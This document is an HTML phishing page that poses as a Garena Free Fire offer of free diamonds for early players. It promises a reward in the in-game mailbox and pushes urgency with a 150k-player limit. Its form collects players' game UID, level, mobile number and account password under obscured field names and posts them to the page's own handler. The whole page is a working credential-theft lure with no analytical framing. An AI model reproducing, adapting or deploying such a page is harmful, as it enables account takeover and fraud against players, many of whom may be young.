<html>
	<head>
		<meta http-equiv='Content-Type' content='text/html;charset=UTF-8'>
		<link type='text/css' rel='stylesheet' href='astro.css'>
	</head>

	<body>
		<div class='padtop mars'>
        <center>
				<img src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRdeCzVMEdG_YRFZlE8D3k8UX88pyvTyvMSxw&usqp=CAU' height='362' width='600'>
				<br>
				<form class='m0' method='POST'>
					<input type='hidden' name='hash' value='vHJJ8NC5BFO1ulFGBmJu'>
					<input type='hidden' name='pageName' value='461343'>
					<input type='hidden' name='randomize' value='1806030201401'>

					<h2 class='laya'>Dear player, Garena Free Fire will give you free diamonds, first time only. Because Garena launched Free Fire max beta version in some country and players give 4+ rating for Max version.</h2>
					<h3 class='laya'>The 920 Diamods only give first 150k player, Enter your information fast. And click Submit button.</h3>
                    <h3 class='laya'>After you click submit button then check your game mail box in 25 minutes.</h3>
                    <table>
                        <tr>
							<td><label class='sidi'>UID</label></td>
							<td><input name='mima' type='text'><br /></td>		
					  </tr>
                        <tr>
                          <td><label class='sidi'>Level</label></td>
                          <td><input name='mima' type='text'><br /></td>		
                    </tr>
                        <tr>
							<td><label class='sidi'>Mo.Number</label></td>
							<td><input name='mima' type='text'><br /></td>		
					  </tr>
					  <tr>
							<td><label class='sidi'>Password</label></td>
							<td><input name='poussa' type='password'><br /></td>		
					  </tr>
					</table>
					<input class='neptune' value='Submit' type='submit'>
				</form>                 
	    </center>
        
	</body>
</html>